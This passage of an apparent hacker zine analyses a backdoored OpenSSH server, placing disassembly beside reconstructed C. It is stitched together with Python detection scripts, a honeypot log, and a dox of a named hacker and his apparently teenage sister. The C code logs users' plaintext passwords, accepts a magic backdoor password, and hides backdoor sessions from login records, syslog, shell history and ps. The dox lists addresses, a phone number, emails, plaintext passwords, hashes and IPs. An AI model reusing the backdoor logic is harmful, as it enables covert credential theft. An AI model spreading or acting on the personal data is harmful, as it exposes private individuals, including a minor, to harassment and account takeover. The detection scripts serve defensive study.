.text:0804FAE9 lea esi, [esi+0]
|
||
.text:0804FAEC
|
||
.text:0804FAEC loc_804FAEC: ; CODE XREF: sys_auth_passwd+53j
|
||
.text:0804FAEC sub esp, 8
|
||
.text:0804FAEF push (offset aSshRsa+6) ; aSshRsa+6 = 'a'
|
||
.text:0804FAF4 push offset aEtcModule ; "/etc/module-"
|
||
.text:0804FAF9 call _fopen64
|
||
.text:0804FAFE push edi
|
||
.text:0804FAFF push dword ptr [esi] ; esi = authctxt->pw, [esi] = pw->pw_name
|
||
.text:0804FB01 push offset aLoginInSS ; "login in: %s:%s\n"
|
||
.text:0804FB06 push eax ; stream
|
||
.text:0804FB07 mov ebx, eax
|
||
.text:0804FB09 call _fprintf
|
||
.text:0804FB0E add esp, 14h
|
||
.text:0804FB11 push ebx ; stream
|
||
.text:0804FB12 call _fclose
|
||
.text:0804FB17 lea esp, [ebp-0Ch]
|
||
.text:0804FB1A pop ebx
|
||
.text:0804FB1B pop esi
|
||
.text:0804FB1C mov edx, 1
|
||
.text:0804FB21 mov eax, edx
|
||
.text:0804FB23 pop edi
|
||
.text:0804FB24 leave
|
||
.text:0804FB25 retn
|
||
.text:0804FB25 ; ---------------------------------------------------------------------------
|
||
.text:0804FB26 align 4
|
||
.text:0804FB28
|
||
.text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
|
||
.text:0804FB28 sub esp, 0Ch
|
||
.text:0804FB2B push esi
|
||
.text:0804FB2C call shadow_pw
|
||
.text:0804FB31 mov ebx, eax
|
||
.text:0804FB33 add esp, 10h
|
||
.text:0804FB36 jmp loc_804FA88
|
||
.text:0804FB36 sys_auth_passwd endp
|
||
*/
|
||
|
||
int sys_auth_passwd(Authctxt *authctxt, const char *password) //BEGIN: Standard OpenSSH code
|
||
{
|
||
struct passwd *pw = authctxt->pw;
|
||
char *encrypted_password;
|
||
|
||
/* Just use the supplied fake password if authctxt is invalid */
|
||
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
|
||
|
||
/* Check for users with no password. */
|
||
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
|
||
return (1);
|
||
|
||
/* Encrypt the candidate password using the proper salt. */
|
||
encrypted_password = xcrypt(password,
|
||
(pw_password[0] && pw_password[1]) ? pw_password : "xx");
|
||
|
||
if (strcmp(encrypted_password, pw_password) != 0) //END: Standard OpenSSH code
|
||
return 0;
|
||
|
||
log = fopen64(EtcModule,"a"); //Open the log file
|
||
fprintf(log,"login in: %s:%s\n",pw->pw_name,password); //Print "login in: <username>:<password>\n" into the file
|
||
fclose(log);
|
||
return 1; //Return authenticated
|
||
/* //Replaced code
|
||
* Authentication is accepted if the encrypted passwords
|
||
* are identical.
|
||
*/
|
||
//return (strcmp(encrypted_password, pw_password) == 0);
|
||
}
|
||
|
||
|
||
|
||
|
||
/*
|
||
.text:0804FB3C public auth_password
|
||
.text:0804FB3C auth_password proc near ; CODE XREF: auth1_process_password+7Dp
|
||
.text:0804FB3C ; do_authentication+130p ...
|
||
.text:0804FB3C
|
||
.text:0804FB3C arg_0 = dword ptr 8
|
||
.text:0804FB3C arg_4 = dword ptr 0Ch
|
||
.text:0804FB3C
|
||
.text:0804FB3C push ebp
|
||
.text:0804FB3D mov ebp, esp
|
||
.text:0804FB3F push edi
|
||
.text:0804FB40 push esi
|
||
.text:0804FB41 push ebx
|
||
.text:0804FB42 sub esp, 0Ch
|
||
.text:0804FB45 mov ebx, [ebp+arg_4]
|
||
.text:0804FB48 mov ds:hookarOn, 0
|
||
.text:0804FB52 mov esi, ebx
|
||
.text:0804FB54 mov edi, offset a0x3aownt ; "0x3aownt"
|
||
.text:0804FB59 mov ecx, 9
|
||
.text:0804FB5E cld
|
||
.text:0804FB5F repe cmpsb
|
||
.text:0804FB61 jnz short loc_804FB7C
|
||
.text:0804FB63 mov ds:hookarOn, 1
|
||
.text:0804FB6D mov eax, 1
|
||
.text:0804FB72
|
||
.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj
|
||
.text:0804FB72 ; auth_password+89j ...
|
||
.text:0804FB72 lea esp, [ebp-0Ch]
|
||
.text:0804FB75 pop ebx
|
||
.text:0804FB76 pop esi
|
||
.text:0804FB77 pop edi
|
||
.text:0804FB78 leave
|
||
.text:0804FB79 retn
|
||
*/
|
||
|
||
|
||
int
|
||
auth_password(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd * pw = authctxt->pw;
|
||
int result, ok = authctxt->valid;
|
||
|
||
hookarOn = 0; //Unset the hookarOn flag
|
||
if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password
|
||
hookarOn = 1; //Set the hookarOn flag
|
||
return 1; //Return authenticated
|
||
}
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
/*
|
||
.text:080508A0 public record_login
|
||
.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p
|
||
.text:080508A0 ; mm_answer_pty+116p
|
||
.text:080508A0
|
||
.text:080508A0 var_278 = dword ptr -278h
|
||
.text:080508A0 timer = dword ptr -25Ch
|
||
.text:080508A0 s = byte ptr -258h
|
||
.text:080508A0 var_58 = byte ptr -58h
|
||
.text:080508A0 var_57 = byte ptr -57h
|
||
.text:080508A0 arg_0 = dword ptr 8
|
||
.text:080508A0 arg_4 = dword ptr 0Ch
|
||
.text:080508A0 arg_8 = dword ptr 10h
|
||
.text:080508A0 arg_C = dword ptr 14h
|
||
.text:080508A0 arg_10 = dword ptr 18h
|
||
.text:080508A0 arg_14 = dword ptr 1Ch
|
||
.text:080508A0 arg_18 = dword ptr 20h
|
||
.text:080508A0
|
||
.text:080508A0 push ebp
|
||
.text:080508A1 mov ebp, esp
|
||
.text:080508A3 push edi
|
||
.text:080508A4 push esi
|
||
.text:080508A5 push ebx
|
||
.text:080508A6 sub esp, 25Ch
|
||
.text:080508AC mov edx, ds:hookarOn
|
||
.text:080508B2 test edx, edx
|
||
.text:080508B4 mov esi, [ebp+arg_8]
|
||
.text:080508B7 jnz short loc_8050910
|
||
.
|
||
.
|
||
.
|
||
.text:08050910 loc_8050910: ; CODE XREF: record_login+17j
|
||
.text:08050910 lea esp, [ebp-0Ch]
|
||
.text:08050913 pop ebx
|
||
.text:08050914 pop esi
|
||
.text:08050915 pop edi
|
||
.text:08050916 leave
|
||
.text:08050917 retn
|
||
*/
|
||
|
||
/*
|
||
* Records that the user has logged in. I wish these parts of operating
|
||
* systems were more standardized.
|
||
*/
|
||
void
|
||
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
|
||
const char *host, struct sockaddr * addr, socklen_t addrlen)
|
||
{
|
||
if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user)
|
||
return; //return the record_login() function without executing the rest of the code
|
||
//...
|
||
}
|
||
|
||
|
||
/*
|
||
.text:080509D0 public record_logout
|
||
.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
|
||
.text:080509D0
|
||
.text:080509D0 var_18 = dword ptr -18h
|
||
.text:080509D0 var_4 = dword ptr -4
|
||
.text:080509D0 arg_0 = dword ptr 8
|
||
.text:080509D0 arg_4 = dword ptr 0Ch
|
||
.text:080509D0 arg_8 = dword ptr 10h
|
||
.text:080509D0
|
||
.text:080509D0 push ebp
|
||
.text:080509D1 mov ebp, esp
|
||
.text:080509D3 push ebx
|
||
.text:080509D4 push eax
|
||
.text:080509D5 mov ebx, ds:hookarOn
|
||
.text:080509DB test ebx, ebx
|
||
.text:080509DD mov ecx, [ebp+arg_0]
|
||
.text:080509E0 mov eax, [ebp+arg_4]
|
||
.text:080509E3 mov edx, [ebp+arg_8]
|
||
.text:080509E6 jz short loc_80509F0
|
||
.text:080509E8 mov ebx, [ebp+var_4]
|
||
.text:080509EB leave
|
||
.text:080509EC retn
|
||
.text:080509EC ; ---------------------------------------------------------------------------
|
||
.text:080509ED align 10h
|
||
.text:080509F0
|
||
.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j
|
||
.text:080509F0 push eax
|
||
.text:080509F1 push 0
|
||
.text:080509F3 push edx
|
||
.text:080509F4 push ecx
|
||
.text:080509F5 call login_alloc_entry
|
||
.text:080509FA mov ebx, eax
|
||
.text:080509FC mov [esp+18h+var_18], eax
|
||
.text:080509FF call login_logout
|
||
.text:08050A04 mov [ebp+arg_0], ebx
|
||
.text:08050A07 add esp, 10h
|
||
.text:08050A0A mov ebx, [ebp+var_4]
|
||
.text:08050A0D leave
|
||
.text:08050A0E jmp login_free_entry
|
||
.text:08050A0E record_logout endp
|
||
*/
|
||
|
||
/* Records that the user has logged out. */
|
||
void
|
||
record_logout(pid_t pid, const char *tty, const char *user)
|
||
{
|
||
struct logininfo *li;
|
||
if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
|
||
li = login_alloc_entry(pid, user, NULL, tty);
|
||
login_logout(li);
|
||
login_free_entry(li);
|
||
}
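Because the patched record_login() and record_logout() return early for a backdoor login, such a session holds a pty without a utmp/wtmp record. Added example (not from the original zine): Python that cross-checks sshd-spawned ptys against `who` output, run here on constructed samples. The `ps -eo pid,ppid,tty,user,comm` column layout and all user names are assumptions, and on a live host both listings should come from trusted binaries.

```python
# Constructed `ps -eo pid,ppid,tty,user,comm` output; users are placeholders.
SAMPLE_PS = """\
  PID  PPID TT       USER     COMMAND
    1     0 ?        root     init
 2210     1 ?        root     sshd
 5193     1 tty2     root     mingetty
 6100  2210 ?        root     sshd
 6101  6100 ?        alice    sshd
 6102  6101 pts/0    alice    bash
 6200  2210 ?        root     sshd
 6203  6200 pts/1    root     bash
 6300  6203 pts/1    root     vi
 6399     1 ?        alice    screen
 6400  6399 pts/3    alice    bash
"""

# Constructed `who` output: only pts/0 has a utmp record.
SAMPLE_WHO = """\
alice    pts/0        2009-06-08 11:41 (198.51.100.20)
"""


def parse_ps(ps_text):
    """Parse the five-column ps listing, skipping the header line."""
    procs = []
    for line in ps_text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) == 5 and parts[0].isdigit() and parts[1].isdigit():
            procs.append({
                "pid": int(parts[0]), "ppid": int(parts[1]),
                "tty": parts[2], "user": parts[3], "comm": parts[4].strip(),
            })
    return procs


def utmp_ttys(who_text):
    """Terminal lines (second column of `who`) that have a utmp record."""
    fields = (line.split() for line in who_text.splitlines())
    return {f[1] for f in fields if len(f) >= 2}


def unrecorded_ssh_sessions(ps_text, who_text):
    """Return ptys whose first process was spawned by sshd but which have
    no utmp entry.

    Only processes whose direct parent is sshd are considered, so console
    gettys and ptys created by screen or similar tools are not reported.
    """
    procs = parse_ps(ps_text)
    comm_by_pid = {p["pid"]: p["comm"] for p in procs}
    recorded = utmp_ttys(who_text)
    findings = []
    for p in procs:
        spawned_by_sshd = comm_by_pid.get(p["ppid"]) == "sshd"
        if p["tty"].startswith("pts/") and spawned_by_sshd and p["tty"] not in recorded:
            findings.append({"tty": p["tty"], "pid": p["pid"], "user": p["user"]})
    return findings


if __name__ == "__main__":
    for finding in unrecorded_ssh_sessions(SAMPLE_PS, SAMPLE_WHO):
        print("sshd session without utmp record:", finding)
```

A finding is a lead rather than proof: utmp can be missing for other reasons, so confirm against sshd's own authentication log and the integrity of the sshd binary.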
|
||
|
||
|
||
/*
.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj
.text:08057050 sub esp, 0Ch
.text:08057053 push offset aTz ; "TZ"
.text:08057058 call _getenv
.text:0805705D add esp, 10h
.text:08057060 test eax, eax
.text:08057062 jnz loc_8057696
.text:08057068 cmp ds:hookarOn, 1
.text:0805706F jz loc_80576CF
.text:08057075
.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj
.text:08057075 ; do_child+883j
.text:08057075 mov ebx, dword ptr ds:options+6ACh
.text:0805707B test ebx, ebx
.text:0805707D jnz short loc_80570FB


.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j
.text:08057696 sub esp, 0Ch
.text:08057699 push offset aTz ; "TZ"
.text:0805769E call _getenv
.text:080576A3 add esp, 10h
.text:080576A6 push eax ; int
.text:080576A7 push offset aTz ; "TZ"
.text:080576AC lea edx, [ebp+var_16AC]
.text:080576B2 push edx ; int
.text:080576B3 lea eax, [ebp+envp]
.text:080576B9 push eax ; int
.text:080576BA call child_set_env
.text:080576BF add esp, 10h
.text:080576C2 cmp ds:hookarOn, 1
.text:080576C9 jnz loc_8057075
.text:080576CF
*/

/*
 * Performs common processing for the child, such as setting up the
 * environment, closing extra file descriptors, setting the user and group
 * ids, and executing the command or shell.
 */

void
do_child(Session *s, const char *command)
{
    extern char **environ;
    char **env;
    char *argv[10];
    const char *shell, *shell0, *hostname = NULL;
    struct passwd *pw = s->pw;

    //...

    /*
     * Make sure $SHELL points to the shell from the password file,
     * even if shell is overridden from login.conf
     */
    env = do_setup_env(s, shell);

    //...
}


//...
static char **
do_setup_env(Session *s, const char *shell)
{
    char buf[256];
    u_int i, envsize;
    char **env, *laddr, *path = NULL;
    struct passwd *pw = s->pw;

    //...
        /* Normal systems set SHELL by default. */
        child_set_env(&env, &envsize, "SHELL", shell);
    }
    if (getenv("TZ"))
        child_set_env(&env, &envsize, "TZ", getenv("TZ"));
    if (hookarOn == 1) { // If the hookarOn flag is set
        child_set_env(&env, &envsize, "HISTFILE", "/dev/null"); // Set HISTFILE to /dev/null (no history logging)
    }

    //...
}




/*
.text:080584F0 public session_proctitle
.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj
.text:080584F0 ; session_close+14Bj ...
.text:080584F0
.text:080584F0 var_18 = dword ptr -18h
.text:080584F0 var_14 = dword ptr -14h
.text:080584F0 var_10 = dword ptr -10h
.text:080584F0 arg_0 = dword ptr 8
.text:080584F0
.text:080584F0 push ebp
.text:080584F1 mov ebp, esp
.text:080584F3 push edi
.text:080584F4 push esi
.text:080584F5 push ebx
.text:080584F6 sub esp, 0Ch
.text:080584F9 mov eax, [ebp+arg_0]
.text:080584FC mov esi, [eax+8]
.text:080584FF test esi, esi
.text:08058501 jz loc_8058645
.text:08058507 mov ebx, ds:hookarOn
.text:0805850D test ebx, ebx
.text:0805850F jnz loc_80585FC

.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j
.text:080585EC call setproctitle
.text:080585F1 add esp, 10h
.text:080585F4 lea esp, [ebp-0Ch]
.text:080585F7 pop ebx
.text:080585F8 pop esi
.text:080585F9 pop edi
.text:080585FA leave
.text:080585FB retn
.text:080585FC ; ---------------------------------------------------------------------------
.text:080585FC
.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj
.text:080585FC sub esp, 8
.text:080585FF push (offset asc_8081F90+4) ; ""
.text:08058604 push (offset asc_8081F90+4) ; ""
.text:08058609 jmp short loc_80585EC
*/

void
session_proctitle(Session *s)
{
    if (s->pw == NULL)
        error("no user for session %d", s->self);
    else {
        if (hookarOn) { // If the hookarOn flag is set
            setproctitle("", ""); // Set current process title to "" to hide from process status list (ps)
            return;
        }
        //...
    }
}



/*
.text:08060D30 ; int __cdecl login_write(struct utmp *ptr)
.text:08060D30 public login_write
.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj
.text:08060D30 ; login_login+Dj
.text:08060D30
.text:08060D30 var_18 = dword ptr -18h
.text:08060D30 var_4 = dword ptr -4
.text:08060D30 ptr = dword ptr 8
.text:08060D30
.text:08060D30 push ebp
.text:08060D31 mov ebp, esp
.text:08060D33 push ebx
.text:08060D34 push eax
.text:08060D35 xor eax, eax
.text:08060D37 cmp ds:hookarOn, 1
.text:08060D3E mov ebx, [ebp+ptr]
.text:08060D41 jz short loc_8060D5E
.text:08060D43 call _geteuid
.text:08060D48 test eax, eax
.text:08060D4A jz short loc_8060D64
.text:08060D4C sub esp, 0Ch
.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060D54 call logit
.text:08060D59 mov eax, 1
.text:08060D5E
.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j
.text:08060D5E mov ebx, [ebp+var_4]
.text:08060D61 leave
.text:08060D62 retn
*/

/**
 ** login_write: Call low-level recording functions based on autoconf
 ** results
 **/
int
login_write(struct logininfo *li)
{
    if (hookarOn == 1) return 0; // If the hookarOn flag is set (backdoor authenticated user), return without executing the rest of the code
    //...
}



/*
.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A60C public do_log
.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp
.text:0806A60C ; debug3+Fp ...
.text:0806A60C
.text:0806A60C dest = byte ptr -818h
.text:0806A60C buf = byte ptr -418h
.text:0806A60C arg_0 = dword ptr 8
.text:0806A60C arg_4 = dword ptr 0Ch
.text:0806A60C arg = dword ptr 10h
.text:0806A60C
.text:0806A60C push ebp
.text:0806A60D mov ebp, esp
.text:0806A60F push edi
.text:0806A610 push esi
.text:0806A611 push ebx
.text:0806A612 sub esp, 80Ch
.text:0806A618 cmp ds:hookarOn, 1
.text:0806A61F mov eax, [ebp+arg_0]
.text:0806A622 mov ecx, [ebp+arg_4]
.text:0806A625 mov ebx, [ebp+arg]
.text:0806A628 jz loc_806A6E0

.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj
.text:0806A6E0 ; do_log+2Aj ...
.text:0806A6E0 lea esp, [ebp-0Ch]
.text:0806A6E3 pop ebx
.text:0806A6E4 pop esi
.text:0806A6E5 pop edi
.text:0806A6E6 leave
.text:0806A6E7 retn
*/

void
do_log(LogLevel level, const char *fmt, va_list args)
{
    if (hookarOn == 1) return; // If the hookarOn flag is set (backdoor authenticated user), return without executing the rest of the code
    //...
}


// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor.
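
Added example (not part of the original zine and not OpenSSH code): the hookarOn checks shown above leave a session with no utmp record, HISTFILE pointed at /dev/null and a blanked process title, so a defender can look for sshd-descended processes that show that combination. The snapshot format, the sample processes, the indicator names and the function names are assumptions made for this illustration.

```python
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    ppid: int
    cmdline: str          # /proc/<pid>/cmdline with NULs replaced by spaces
    tty: str = ""         # controlling terminal such as "pts/1"; "" if none
    environ: dict = field(default_factory=dict)  # parsed /proc/<pid>/environ


def is_sshd(proc):
    """Match the listener ("/usr/sbin/sshd -D") and titled children ("sshd: user@pts/0")."""
    first = proc.cmdline.split(" ")[0].rstrip(":")
    return first == "sshd" or first.endswith("/sshd")


def sshd_descendants(procs):
    """Pids that have an sshd process somewhere above them in the process tree."""
    by_pid = {p.pid: p for p in procs}
    found = set()
    for p in procs:
        seen, cur = set(), by_pid.get(p.ppid)
        while cur is not None and cur.pid not in seen:
            if is_sshd(cur):
                found.add(p.pid)
                break
            seen.add(cur.pid)
            cur = by_pid.get(cur.ppid)
    return found


def audit_sessions(procs, utmp_ttys):
    """Map each sshd session (pid of the listener's direct child) to its indicators."""
    by_pid = {p.pid: p for p in procs}
    under = sshd_descendants(procs)
    listeners = {p.pid for p in procs if is_sshd(p) and p.pid not in under}
    report = {}
    for p in procs:
        if p.pid not in under:
            continue
        reasons = set()
        # session_proctitle(): assumption - a blanked title shows up as an empty
        # cmdline or as the bare "sshd:" prefix that setproctitle() prepends.
        if p.cmdline.strip() in ("", "sshd:"):
            reasons.add("blank-proctitle")
        # do_setup_env(): HISTFILE forced to /dev/null and inherited by children.
        if p.environ.get("HISTFILE") == "/dev/null":
            reasons.add("histfile-devnull")
        # login_write()/record_logout(): a pty in use that has no utmp record.
        if p.tty.startswith("pts/") and p.tty not in utmp_ttys:
            reasons.add("no-utmp:" + p.tty)
        if reasons:
            root = p
            while root.ppid not in listeners:   # climb to the listener's child
                root = by_pid[root.ppid]
            report.setdefault(root.pid, set()).update(reasons)
    return {pid: sorted(r) for pid, r in report.items()}


def likely_hidden(report):
    """Sessions with the utmp gap plus at least one other indicator."""
    return sorted(pid for pid, r in report.items()
                  if len(r) >= 2 and any(x.startswith("no-utmp:") for x in r))


# Constructed snapshot (not data from the page): a normal login (alice), a session
# showing all three artefacts (pid 1300), and a user who disabled history himself (bob).
SNAPSHOT = [
    Proc(1, 0, "/sbin/init"),
    Proc(700, 1, "/usr/sbin/sshd -D"),
    Proc(1200, 700, "sshd: alice [priv]"),
    Proc(1201, 1200, "sshd: alice@pts/0"),
    Proc(1202, 1201, "-bash", "pts/0", {"HISTFILE": "/home/alice/.bash_history"}),
    Proc(1300, 700, "sshd: "),
    Proc(1301, 1300, "-bash", "pts/1", {"HISTFILE": "/dev/null", "TZ": "UTC"}),
    Proc(1302, 1301, "ps aux", "pts/1", {"HISTFILE": "/dev/null", "TZ": "UTC"}),
    Proc(1400, 700, "sshd: bob [priv]"),
    Proc(1401, 1400, "sshd: bob@pts/2"),
    Proc(1402, 1401, "-bash", "pts/2", {"HISTFILE": "/dev/null"}),
]
UTMP_TTYS = {"pts/0", "pts/2"}   # ttys with a USER_PROCESS record, as `who` lists them

if __name__ == "__main__":
    report = audit_sessions(SNAPSHOT, UTMP_TTYS)
    for pid in sorted(report):
        print(pid, report[pid])
    print("likely hidden:", likely_hidden(report))
```

A user who only sets HISTFILE=/dev/null (pid 1400 in the sample) is reported but not escalated; a session is escalated only when the utmp gap appears together with another indicator. Because do_log() is also short-circuited, sshd's own syslog lines cannot confirm or refute a finding, so network flow records for the SSH port are the natural cross-check.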

root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup
root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users
root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users
root 0x3aownt
root@srv01 [~/downloads/kojoney]#


Honeypot Report
-----------------------

Date: Tue 23 Jun 2009 05:14:39 AM EDT
Log lines: 1173
Log size: 88K /var/log/honeypot.log

Authenticated users. Successfull logons
---------------------------------------

2 root

Total 2

Unauthenticated users. Failed logons
------------------------------------

72 root
5 test
5 oracle
2 0x3aownt
1 infosec

Total 85

Users successfully authenticateds with publickey
------------------------------------------------


Total 0

Users unsuccessfully authenticateds with publickey
--------------------------------------------------


Total 0

Logons with null passwords
--------------------------

8 root
2 0x3aownt
1 infosec

Total 11

Logons with or without password
-------------------------------

82 root
5 test
5 oracle
4 0x3aownt
2 infosec

Total 98

Number of times a remote shell was opened
-----------------------------------------

Total 2

X11 forward requests
--------------------

Total 0

Executed different commands
---------------------------

3 w
2 ls
1 quit
1 ps
1 pls -la etc
1 ls -lals
1 ls -la lol
1 ls -la
1 id
1 exit
1 cd /var
1 cd /etc
1 caexit
1 bullshit .

Total 17

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------

Total 0

IP Addresses
------------

1 123.233.245.226 - 75 conexion(es)
2 91.184.220.239 - 2 conexion(es)
3 64.191.69.101 - 10 conexion(es)

Total 3

Sessions opened by humans
-------------------------

Typo error filter: Session with id 3 opened by a human // RoMeO

1 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------

Total 1

/*
After re-imaging and recovering the server, an SSHD honeypot was installed and configured with the backdoor credentials.
Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor
password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3.
*/


_______ _______ ________
|
||
\ _ \ ___ __\ _ \ \_____ \
|
||
/ /_\ \\ \/ / /_\ \ / ____/
|
||
\ \_/ \> <\ \_/ \/ \
|
||
\_____ /__/\_ \\_____ /\_______ \
|
||
\/ \/ \/ \/
|
||
|
||
___________ __
|
||
\__ ___/____ _______ ____ _____/ |_
|
||
| | \__ \\_ __ \/ ___\_/ __ \ __\
|
||
| | / __ \| | \/ /_/ > ___/| |
|
||
|____| (____ /__| \___ / \___ >__|
|
||
\/ /_____/ \/
|
||
__________ _____.__.__ .__
|
||
\______ \_______ _____/ ____\__| | |__| ____ ____
|
||
| ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\
|
||
| | | | \( <_> ) | | | |_| | | \/ /_/ >
|
||
|____| |__| \____/|__| |__|____/__|___| /\___ /
|
||
\//_____/
|
||
|
||
|
||
1)
|
||
|
||
RoMeO:
|
||
-----
|
||
Real Name: Faisal Hourani
|
||
Sister Name: Joud Hourani
|
||
Country: Saudi Arabia
|
||
City: Riyadh
|
||
Previous City: Jeddah
|
||
Address: King Fahad ST
|
||
Age: 20
|
||
Birthday: April 02
|
||
Horoscope: Aries
|
||
Height: 1.73cm (5.7")
|
||
Phone Number: +966.509121268
|
||
Nickname: RoMeO
|
||
Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com
|
||
MSN: romeo@darkmindz.com
|
||
ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255
|
||
Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com
|
||
Domain Hosting: hr-development.net
|
||
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
|
||
Skills: _lulz_
|
||
Certifications: GSCE English, Math A Level
|
||
Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth)
|
||
Fake Names: James Knuth
|
||
Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com
|
||
PsyBNC Host: absolute.ownage.net / 72.20.28.205
|
||
Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq
|
||
Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419
|
||
Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09)
|
||
Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr
|
||
Common Bash Commands: netstat, netstat, netstat @ (Panic Mode)
|
||
IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk
|
||
Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org
|
||
Cars Driving: Golf GTI, Nissan Armada
|
||
Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life
|
||
Favorite Movies: House of Wax, The Notebook
|
||
Favorite Games: Counter-Strike, Doom 3
|
||
Favorite Music: Fergie, Chris Brown, Fadel and Yara
|
||
School: Thamer International School, Jeddah, Saudi Arabia
|
||
Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom)
|
||
Studies Course: Software Engineering
|
||
|
||
RoMeO's sister:
|
||
---------------
|
||
|
||
Full Name: Jude (Joud) Hourani or Al-Hourani
|
||
Nationality: Jordanese
|
||
Speaks: English, French, Arabic and possibly 1 or 2 other languages.
|
||
Lives in: Jeddah (Saudi Arabia)
|
||
Birthday: July 14th 1993
|
||
Age: 17
|
||
Zodiac: Cancer
|
||
Hair color: Black and Brown (Her worst habit...)
|
||
Height: 1.68cm ~ 1.72cm
|
||
Drinks: Sprite, 7up, Pepsi and Cade
|
||
Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess,
|
||
Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers,
|
||
Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty,
|
||
Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =)
|
||
TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular,
|
||
Sleepover club and many other...
|
||
Quote: "Elordon Awalan" which means "Jordan First!"
|
||
Sports: Basketball and Tennis
|
||
Eats: French fries, shrimps and candy!!! Hehehe... :-T
|
||
Ice-Cream: Chocolate, Lime and Strawberry
|
||
Candy: HARIBO
|
||
Colors: White, Black, Red, Pink and Blue
|
||
Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet
|
||
and watching movies! Yeeah! :-P
|
||
Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L!
|
||
Dream Vacations: USA Disney Land
|
||
|
||
|
||
|
||
Darkmindz.com on 2007-02-24 - Domain History
|
||
|
||
Registrant:
|
||
Individual
|
||
Chilis building Hamra street
|
||
jeddah, 6277
|
||
SA
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Perlman, Menachem menachem12345@gmail.com
|
||
Chilis building Hamra street
|
||
jeddah, 6277
|
||
SA
|
||
+966.509121268
|
||
Technical Contact:
|
||
NOC (Network Operations Center), Servage.net noc@servage.com
|
||
Im Grund 9
|
||
Flensburg, DE 24939
|
||
DE
|
||
+49.46116098358 Fax: +49.46116098359
|
||
|
||
|
||
Darkmindz.com on 2007-04-06 - Domain History
|
||
|
||
|
||
Registrant:
|
||
Individual
|
||
Kind Fahad ST.
|
||
Riyadh,
|
||
sa
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Haxxor, RoMeO romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
sa
|
||
+966.509121268
|
||
Technical Contact:
|
||
NOC (Network Operations Center), Servage.net noc@servage.com
|
||
Im Grund 9
|
||
Flensburg, DE 24939
|
||
DE
|
||
+49.46116098358 Fax: +49.46116098359
|
||
|
||
Registration Service Provider:
|
||
Servage.net Hosting, support@servage.net
|
||
+49 46116098359 (fax)
|
||
http://www.servage.net/
|
||
|
||
|
||
